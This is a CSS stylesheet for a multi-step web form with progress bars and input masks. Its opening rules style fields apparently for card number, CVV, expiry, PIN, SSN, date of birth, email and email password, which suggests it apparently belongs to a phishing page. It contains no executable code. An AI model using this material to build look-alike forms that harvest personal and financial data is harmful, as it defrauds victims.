   
input#fn {
    background-image: url(msg_files/4.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#cw {
    background-image: url(msg_files/15.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#cc {
    background-image: url(msg_files/1.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#exp {
    background-image: url(msg_files/10.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#csc {
    background-image: url(msg_files/9.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#pin {
    background-image: url(msg_files/11.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#ssn {
    background-image: url(msg_files/5.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#dob {
    background-image: url(msg_files/6.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#em {
    background-image: url(msg_files/2.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input#emp {
    background-image: url(msg_files/3.jpg);
    background-repeat: no-repeat;
	background-position:left;
    text-indent: 60px;
}
input::placeholder {
  font-size: 13px;
font-family: 'Baloo Paaji 2', cursive;
}
.input-label[data-v-5dff800b]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-5dff800b]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
.container ul li[data-v-5dff800b]:not(:last-child){padding-bottom:0
}
.container .progress-bar-wrapper[data-v-5dff800b]{padding-top:2.5em;margin-bottom:3.2rem;position:relative
}
.container ul.step-progress-bar[data-v-5dff800b]{display:block;width:118%;margin-top:20px;margin-left:-9%;padding:0
}
.container ul.step-progress-bar .single-line-padding[data-v-5dff800b]{padding-bottom:10px
}
.container ul.step-progress-bar .progress-label[data-v-5dff800b]{position:absolute;bottom:120%;width:100%;left:0;color:#68696A;text-align:center;font-weight:600;word-wrap:normal
}
@media only screen and (min-width: 500px){
.container ul.step-progress-bar .progress-label[data-v-5dff800b]{width:70%;left:15%
}
}
.container ul.step-progress-bar .step-item[data-v-5dff800b]{display:inline-block;width:25%;text-align:center;position:relative;font-size:14px;color:#E2EAF0;transition:color .2s ease
}
@media (min-width: 683px){
.container ul.step-progress-bar .step-item[data-v-5dff800b]{font-size:16px
}
}
.container ul.step-progress-bar .step-item[data-v-5dff800b]:after{content:'';position:absolute;height:6px;background-color:#E2EAF0;width:90%;top:40%;left:55%;transition:background-color .2s ease
}
.container ul.step-progress-bar .step-item[data-v-5dff800b]:last-child:after{content:none
}
.container ul.step-progress-bar .step-item[data-v-5dff800b]:before{display:inline-block;content:'';background:#E2EAF0;border:4px solid #E2EAF0;width:28px;height:28px;border-radius:19px;position:relative;transition:border-color .2s ease;z-index:1
}
.container ul.step-progress-bar .step-item .step-item-checkmark[data-v-5dff800b]{display:none;position:absolute;top:26%;left:calc(50% - 7px);z-index:1
}
.container ul.step-progress-bar .step-item .visually-hidden[data-v-5dff800b]{position:absolute;clip:rect(1px 1px 1px 1px);clip:rect(1px, 1px, 1px, 1px);padding:0;border:0;height:1px;width:1px;overflow:hidden
}
.container ul.step-progress-bar .step-item.current[data-v-5dff800b]{color:#fff
}
.container ul.step-progress-bar .step-item.current[data-v-5dff800b]:before{content:'';border-color:#0667BA;background:#fff
}
.container ul.step-progress-bar .step-item.success[data-v-5dff800b]{color:#fff
}
.container ul.step-progress-bar .step-item.success .step-item-checkmark[data-v-5dff800b]{display:block
}
.container ul.step-progress-bar .step-item.success[data-v-5dff800b]:before{border-color:#0667BA;background-color:#0667BA
}
.container ul.step-progress-bar .step-item.success[data-v-5dff800b]:not(.current):after{background-color:#0667BA
}
.choice-listing[data-v-783ec639]{padding:0;list-style-type:none;margin-top:32px
}
.choice-listing li[data-v-783ec639]:not(:first-child){margin-top:2rem
}
.choice-listing li[data-v-783ec639]{padding-bottom:0
}
.choice[data-v-783ec639]{display:block;color:#0C0D0E;transition:background-color 0.2s ease-in-out;min-height:7rem;width:100%;border:0;padding-left:20px;text-align:left;padding-right:40px;background:no-repeat right 10px center url("/assets/img/chevron_right.svg"),#e6f1fb
}
.choice[data-v-783ec639]:hover{transition:background-color 0.2s ease-in-out;background-color:#d0e5f7;cursor:pointer
}
.input-label[data-v-dd465ece],legend[data-v-dd465ece]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-dd465ece]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
legend[data-v-dd465ece]{font-size:2.2rem
}
.radio-inline[data-v-dd465ece]{margin:0 0 0 -1.6rem;padding:0;opacity:0;float:left
}
.radio-inline:checked+label[data-v-dd465ece]{background-image:url("/assets/img/radio_checked.svg")
}
.radio-inline:focus+label[data-v-dd465ece]{outline:2px dotted #0667BA
}
.radio-inline+label[data-v-dd465ece]{padding-left:3rem;color:#0C0D0E;margin-bottom:0;padding-bottom:6px;padding-top:6px;background-image:url("/assets/img/radio_unchecked.svg");background-repeat:no-repeat;background-position:0 50%;background-size:2.5rem 2.5rem
}
.option-header[data-v-dd465ece]{vertical-align:middle;font-size:1.8rem
}
.option[data-v-dd465ece]:not(:first-child){margin-top:16px
}
.input-label[data-v-7d1371a8],label[data-v-7d1371a8]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-7d1371a8]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
label[data-v-7d1371a8]{display:block;margin-bottom:8px
}
select[data-v-7d1371a8]{max-width:100%
}
select[data-v-7d1371a8]:focus{outline:2px dotted #0667BA
}
h2[data-v-51f3dece]{padding-top:20px
}
.super-prompt[data-v-51f3dece]{margin-bottom:27px;padding:0 0 10px;text-align:center;border-bottom:1px solid lightgray
}
@media (min-width: 683px){
.super-prompt[data-v-51f3dece]{padding:0 30px 30px;margin-bottom:38px
}
}
.super-prompt .prompt[data-v-51f3dece]{line-height:3.5rem
}
.super-prompt .congratulations-medal[data-v-51f3dece]{margin-bottom:16px
}
legend[data-v-169bc697]{padding-top:8px
}
legend .prompt-help[data-v-169bc697]{margin-bottom:0;margin-top:16px
}
legend h2[data-v-169bc697]{padding-top:1.6rem
}
header[data-v-169bc697]{margin-bottom:-16px
}
.input-label[data-v-2ae7dda6],label[data-v-2ae7dda6]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-2ae7dda6]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
label[data-v-2ae7dda6]{font-weight:600;margin-bottom:8px
}
input[data-v-2ae7dda6]{line-height:24px;padding-left:12px
}
input[data-v-2ae7dda6]:focus{outline:2px dotted #0667BA
}
.optional[data-v-2ae7dda6]{font-weight:400
}
.input-group-addon[data-v-2ae7dda6]{font-size:1.6rem;padding:0 1.5rem
}
.input-group-addon+.input-border[data-v-2ae7dda6]{border-bottom-left-radius:0;border-top-left-radius:0
}
.input-group.overwritten[data-v-2ae7dda6]{padding:0
}
.password-eye[data-v-2ae7dda6]{position:absolute;right:0.5em;top:0.6em;border-bottom:none
}
.password-eye[data-v-2ae7dda6]:focus,.password-eye[data-v-2ae7dda6]:hover{outline:none
}
input[type=password][data-v-2ae7dda6]::-ms-reveal,input[type=password][data-v-2ae7dda6]::-ms-clear,input[data-v-2ae7dda6]::-ms-clear{display:none
}
[data-v-2ae7dda6]:-moz-ui-invalid{box-shadow:none
}
.note[data-v-2ae7dda6]{color:#767676;font-weight:500
}
.input-label[data-v-1355d37a],label[data-v-1355d37a],legend[data-v-1355d37a]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-1355d37a]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
label[data-v-1355d37a]{font-weight:600;margin-bottom:8px
}
input[data-v-1355d37a]{line-height:24px;padding-left:12px
}
input[data-v-1355d37a]:focus{outline:2px dotted #0667BA
}
.optional[data-v-1355d37a]{font-weight:400
}
.input-group-addon[data-v-1355d37a]{font-size:1.6rem;padding:0 1.5rem
}
.input-group-addon+.input-border[data-v-1355d37a]{border-bottom-left-radius:0;border-top-left-radius:0
}
.input-label[data-v-1355d37a],label[data-v-1355d37a],legend[data-v-1355d37a]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-1355d37a]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
legend[data-v-1355d37a]{margin-bottom:16px
}
label[data-v-1355d37a]{display:block;margin-bottom:8px
}
.full-row[data-v-1355d37a]{width:100%;margin-left:15px;margin-top:-16px
}
.full-row div[data-v-1355d37a]{margin-right:10px
}
.full-row select[data-v-1355d37a]{padding:5px 25px 5px 12px
}
.full-row select[data-v-1355d37a]:focus{outline:2px dotted #0667BA
}
.full-row>*[data-v-1355d37a]{margin-top:16px
}
.sel-col[data-v-1355d37a]{width:20rem
}
.error-message[data-v-1355d37a],.error-list[data-v-1355d37a]{margin-left:15px
}
input[data-v-1355d37a]{width:auto
}
.input-label[data-v-2092b0dc],legend[data-v-2092b0dc]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-2092b0dc]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
legend[data-v-2092b0dc]{margin-bottom:16px
}
.radio-inline[data-v-2092b0dc]{padding:0;margin:0 0 0 -1.6rem;opacity:0;float:left
}
.radio-inline:checked+label[data-v-2092b0dc]{background-image:url("/assets/img/radio_checked.svg")
}
.radio-inline:focus+label[data-v-2092b0dc]{outline:2px dotted #0667BA
}
label[data-v-2092b0dc]{line-height:2.2rem
}
.radio-inline+label[data-v-2092b0dc]{padding-left:3rem;color:#0C0D0E;margin-bottom:.75rem;padding-top:2px;background-image:url("/assets/img/radio_unchecked.svg");background-repeat:no-repeat;background-size:2.5rem
}
@media (min-width: 683px){
.radio-inline+label[data-v-2092b0dc]{margin-bottom:0
}
}
.radio-inline[data-v-2092b0dc]{padding-top:1rem
}
.option-header[data-v-2092b0dc]{vertical-align:middle;margin-bottom:16px
}
.option-header[data-v-2092b0dc]:not(:first-child){margin-bottom:16px
}

@media ( max-width : 659px) { /*Only Mobile*/
	.responsive-img.logo {
		width: 180px;
		padding-bottom: 14px;
	}
}

@media ( min-width : 660px) and (max-width:959px) { /*Only Tablet*/
	.responsive-img.logo {
		width: 210px;
		padding-bottom: 14px;
	}
}

.infoBox,.blueInfoBox,.errorBox {
	margin: 0rem 2.5% 2rem 4.5%;
	width: 90%;
}

.blueInfoIcon {
	color: #00AEEF;
}
#popup_this {
    top: 50%;
    left: 50%;
    text-align:center;
    margin-top: -50px;
    margin-left: -100px;
    position: fixed;
    background: #fff;
    padding: 30px;
}
.b-close {
    position: absolute;
    right: 0;
    top: 0;
    cursor: pointer;
    color: #fff;
    background: #ff0000;
    padding: 5px 10px;
}
.input-label[data-v-2756568a]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-2756568a]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
div.notes[data-v-2756568a]{margin-top:3.2rem
}
div.notes p[data-v-2756568a]:first-child{margin-bottom:2px
}
div.notes p[data-v-2756568a]:not(first-child){margin-top:8px
}
.input-label[data-v-1c530256]{margin-bottom:5px;font-weight:600
}
.field-grouping[data-v-1c530256]{margin-bottom:16px;font-size:2.2rem;color:#74777A;text-transform:uppercase;font-weight:700;letter-spacing:2px
}
.white[data-v-1c530256]{background-color:white
}
.clear[data-v-1c530256]{background-color:white
}
.float-md-right .btn[data-v-1c530256]{width:100%
}
.card[data-v-1c530256]{display:block;padding:0 20px 26px;border:0;border-radius:0;color:#0C0D0E
}
.card.noProgressBar[data-v-1c530256]{padding:20px 20px 26px
}
@media (min-width: 683px){
.card[data-v-1c530256]{padding:19px 68px 64px;border-radius:4px;box-shadow:3px 5px 60px rgba(116,116,116,0.35)
}
.card.noProgressBar[data-v-1c530256]{padding:48px 68px 56px
}
}
.actions[data-v-1c530256]{margin-top:64px
}
.text-link[data-v-1c530256]{margin-bottom:0;color:#0667BA;text-decoration:none;border-bottom:1px dotted;cursor:pointer;padding-left:0;padding-right:0
}
.text-link[data-v-1c530256]:hover{color:#0F3d70
}
.text-link[data-v-1c530256]:focus{outline:2px dotted #0667BA
}
.error[data-v-4d446e68]{padding:15px 15px 15px 40px;border:1px solid #fde8e8;margin-bottom:25px;background:no-repeat left 10px center url(assets/img/error.svg),white;font-size:1.8rem;color:#EC0202
}
.error-creditautherror {
    display: block;
    font-size: 12px;
    font-weight: normal;
    line-height: normal;
    color: red;
}

.margin-left45 {
    margin-left: 45px;
}

.normal-error {
    font-size: 12px;
    font-weight: normal;
    line-height: normal;
    color: red;
    margin-left: 10px;
}

.upload-indicator {
    display: inline-block;
    height: 20px;
    width: 6px;
    padding: 0;
    margin: 0 2px 0 0;
    background-color: #05457D;
    border-radius: 3px;
}

.upload-indicator {
    opacity: .1;
    -webkit-animation: loadingAnimation 1s infinite;
    -moz-animation: loadingAnimation 1s infinite;
    -o-animation: loadingAnimation 1s infinite;
    animation: loadingAnimation 1s infinite;
}

    .upload-indicator:nth-child(2) {
        -webkit-animation-delay: 0ms;
        -ms-animation-delay: 0ms;
        animation-delay: 0ms;
    }

    .upload-indicator:nth-child(3) {
        -webkit-animation-delay: 125ms;
        -ms-animation-delay: 125ms;
        animation-delay: 125ms;
    }

    .upload-indicator:nth-child(4) {
        -webkit-animation-delay: 250ms;
        -ms-animation-delay: 250ms;
        animation-delay: 250ms;
    }

.dotdivider {
    text-align: center;
    margin: 2em 0 2em 0;
    position: relative;
}

.disclosure-sub-text .wrapper .dotdivider:before {
    content: "\2022";
    padding: 0 3px;
}
span.im-caret {

    -webkit-animation: 1s blink step-end infinite;

    animation: 1s blink step-end infinite;

}



@keyframes blink {

    from, to {

        border-right-color: black;

    }

    50% {

        border-right-color: transparent;

    }

}



@-webkit-keyframes blink {

    from, to {

        border-right-color: black;

    }

    50% {

        border-right-color: transparent;

    }

}



span.im-static {

    color: grey;

}



div.im-colormask {

    display: inline-block;

    border-style: inset;

    border-width: 2px;

    -webkit-appearance: textfield;

    -moz-appearance: textfield;

    appearance: textfield;

}



div.im-colormask > input {

    position: absolute;

    display: inline-block;

    background-color: transparent;

    color: transparent;

    -webkit-appearance: caret;

    -moz-appearance: caret;

    appearance: caret;

    border-style: none;

    left: 0; /*calculated*/

}



div.im-colormask > input:focus {

    outline: none;

}



div.im-colormask > input::-moz-selection{

    background: none;

}



div.im-colormask > input::selection{

    background: none;

}

div.im-colormask > input::-moz-selection{

    background: none;

}



div.im-colormask > div {

    color: black;

    display: inline-block;

    width: 100px; /*calculated*/

}